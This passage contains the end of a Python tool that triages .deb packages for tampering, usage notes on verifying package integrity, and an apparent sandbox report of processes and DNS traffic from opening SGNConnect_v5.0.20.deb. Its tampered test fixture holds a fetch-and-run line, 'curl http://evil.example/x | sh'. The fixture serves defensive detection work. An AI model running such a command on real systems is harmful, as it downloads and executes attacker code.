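    "prerm": b"#!/bin/sh\nkillall demo\nrm /opt/demo/demo.ini\nexit 0\n",
}
# Payload altered after md5sums was written: one file replaced, one file added.
TAMPERED_DATA = {**SAMPLE_DATA, "opt/demo/demo": b"#!/bin/sh\ncurl http://evil.example/x | sh\n",
                 "opt/demo/.extra": b"x"}


def demo() -> dict:
    return triage(build_deb(SAMPLE_CONTROL, TAMPERED_DATA))


if __name__ == "__main__":
    import json
    print(json.dumps(demo(), indent=1))
```

Run it on a real package with triage(open("SGNConnect_v5.0.20.deb", "rb").read()). On the sample it reports the replaced and the unlisted payload file and lists the chown -R, systemctl enable/start, killall and rm lines of the maintainer scripts with their line numbers; a clean package yields empty md5_mismatch and unlisted lists. md5sums only proves the payload matches what the packager shipped, not who the packager was, so pair it with the repository's signature or a hash pinned from the vendor before installing.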


    UDP Packets
    Timestamp | Source Port | Dest Port | Source IP | Dest IP
    Apr 3, 2025 01:24:06.645951033 CEST | 55248 | 53 | 192.168.2.13 | 1.1.1.1
    Apr 3, 2025 01:24:06.646007061 CEST | 45961 | 53 | 192.168.2.13 | 1.1.1.1
    Apr 3, 2025 01:24:06.745147943 CEST | 53 | 45961 | 1.1.1.1 | 192.168.2.13
    Apr 3, 2025 01:24:06.746330976 CEST | 53 | 55248 | 1.1.1.1 | 192.168.2.13

    DNS Queries
    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
    Apr 3, 2025 01:24:06.645951033 CEST | 192.168.2.13 | 1.1.1.1 | 0x46b6 | Standard query (0) | daisy.ubuntu.com | A (IP address) | IN (0x0001) | false
    Apr 3, 2025 01:24:06.646007061 CEST | 192.168.2.13 | 1.1.1.1 | 0x9b02 | Standard query (0) | daisy.ubuntu.com | 28 (AAAA) | IN (0x0001) | false

    DNS Answers
    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
    Apr 3, 2025 01:24:06.746330976 CEST | 1.1.1.1 | 192.168.2.13 | 0x46b6 | No error (0) | daisy.ubuntu.com | | 162.213.35.24 | A (IP address) | IN (0x0001) | false
    Apr 3, 2025 01:24:06.746330976 CEST | 1.1.1.1 | 192.168.2.13 | 0x46b6 | No error (0) | daisy.ubuntu.com | | 162.213.35.25 | A (IP address) | IN (0x0001) | false

    System Behavior

    Start time (UTC):23:21:24
    Start date (UTC):02/04/2025
    Path:/usr/bin/exo-open
    Arguments:exo-open /tmp/SGNConnect_v5.0.20.deb
    File size:27264 bytes
    MD5 hash:60a307a6a6325e2034eb5cc56bff1abd

    Start time (UTC):23:21:24
    Start date (UTC):02/04/2025
    Path:/usr/bin/exo-open
    Arguments:-
    File size:27264 bytes
    MD5 hash:60a307a6a6325e2034eb5cc56bff1abd

    Start time (UTC):23:21:25
    Start date (UTC):02/04/2025
    Path:/usr/bin/dbus-launch
    Arguments:dbus-launch --autolaunch=ee49dfd4fa47433baee88884e2d7de7c --binary-syntax --close-stderr
    File size:34960 bytes
    MD5 hash:0b22a45154a51c6121bb1d208d8ab203

    Start time (UTC):23:21:25
    Start date (UTC):02/04/2025
    Path:/usr/bin/exo-open
    Arguments:-
    File size:27264 bytes
    MD5 hash:60a307a6a6325e2034eb5cc56bff1abd

    Start time (UTC):23:21:25
    Start date (UTC):02/04/2025
    Path:/usr/bin/exo-open
    Arguments:-
    File size:27264 bytes
    MD5 hash:60a307a6a6325e2034eb5cc56bff1abd

    Start time (UTC):23:21:25
    Start date (UTC):02/04/2025
    Path:/bin/sh
    Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh engrampa /tmp/SGNConnect_v5.0.20.deb
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):23:21:25
    Start date (UTC):02/04/2025
    Path:/usr/bin/engrampa
    Arguments:engrampa /tmp/SGNConnect_v5.0.20.deb
    File size:492616 bytes
    MD5 hash:39fede466e21a42b973e73b62cc7fc09

    Start time (UTC):23:21:25
    Start date (UTC):02/04/2025
    Path:/usr/bin/engrampa
    Arguments:-
    File size:492616 bytes
    MD5 hash:39fede466e21a42b973e73b62cc7fc09

    Start time (UTC):23:21:25
    Start date (UTC):02/04/2025
    Path:/usr/bin/dbus-launch
    Arguments:dbus-launch --autolaunch=ee49dfd4fa47433baee88884e2d7de7c --binary-syntax --close-stderr
    File size:34960 bytes
    MD5 hash:0b22a45154a51c6121bb1d208d8ab203

    Start time (UTC):23:21:28
    Start date (UTC):02/04/2025
    Path:/usr/bin/engrampa
    Arguments:-
    File size:492616 bytes
    MD5 hash:39fede466e21a42b973e73b62cc7fc09

    Start time (UTC):23:21:28
    Start date (UTC):02/04/2025
    Path:/usr/bin/dpkg-deb
    Arguments:dpkg-deb -I /tmp/SGNConnect_v5.0.20.deb
    File size:178728 bytes
    MD5 hash:138cc2b338ff91da07bf7ad1ba786d25

    Start time (UTC):23:21:28
    Start date (UTC):02/04/2025
    Path:/usr/bin/dpkg-deb
    Arguments:-
    File size:178728 bytes
    MD5 hash:138cc2b338ff91da07bf7ad1ba786d25

    Start time (UTC):23:21:28
    Start date (UTC):02/04/2025
    Path:/usr/bin/dpkg-deb
    Arguments:-
    File size:178728 bytes
    MD5 hash:138cc2b338ff91da07bf7ad1ba786d25

    Start time (UTC):23:21:28
    Start date (UTC):02/04/2025
    Path:/usr/bin/dpkg-deb
    Arguments:-
    File size:178728 bytes
    MD5 hash:138cc2b338ff91da07bf7ad1ba786d25

    Start time (UTC):23:21:28
    Start date (UTC):02/04/2025
    Path:/usr/bin/tar
    Arguments:tar -x -m -f - --warning=no-timestamp
    File size:448112 bytes
    MD5 hash:586e1b7caf47a43f5be28968dd4a7329

    Start time (UTC):23:21:28
    Start date (UTC):02/04/2025
    Path:/usr/bin/dpkg-deb
    Arguments:-
    File size:178728 bytes
    MD5 hash:138cc2b338ff91da07bf7ad1ba786d25

    Start time (UTC):23:21:28
    Start date (UTC):02/04/2025
    Path:/usr/bin/rm
    Arguments:rm -rf -- /tmp/dpkg-deb.7lBi6l
    File size:72056 bytes
    MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

    Start time (UTC):23:21:28
    Start date (UTC):02/04/2025
    Path:/usr/bin/engrampa
    Arguments:-
    File size:492616 bytes
    MD5 hash:39fede466e21a42b973e73b62cc7fc09

    Start time (UTC):23:21:28
    Start date (UTC):02/04/2025
    Path:/usr/bin/dpkg-deb
    Arguments:dpkg-deb -c /tmp/SGNConnect_v5.0.20.deb
    File size:178728 bytes
    MD5 hash:138cc2b338ff91da07bf7ad1ba786d25

    Start time (UTC):23:21:28
    Start date (UTC):02/04/2025
    Path:/usr/bin/dpkg-deb
    Arguments:-
    File size:178728 bytes
    MD5 hash:138cc2b338ff91da07bf7ad1ba786d25

    Start time (UTC):23:21:28
    Start date (UTC):02/04/2025
    Path:/usr/bin/dpkg-deb
    Arguments:-
    File size:178728 bytes
    MD5 hash:138cc2b338ff91da07bf7ad1ba786d25

    Start time (UTC):23:21:28
    Start date (UTC):02/04/2025
    Path:/usr/bin/dpkg-deb
    Arguments:-
    File size:178728 bytes
    MD5 hash:138cc2b338ff91da07bf7ad1ba786d25

    Start time (UTC):23:21:28
    Start date (UTC):02/04/2025
    Path:/usr/bin/tar
    Arguments:tar -tv -f - --warning=no-timestamp
    File size:448112 bytes
    MD5 hash:586e1b7caf47a43f5be28968dd4a7329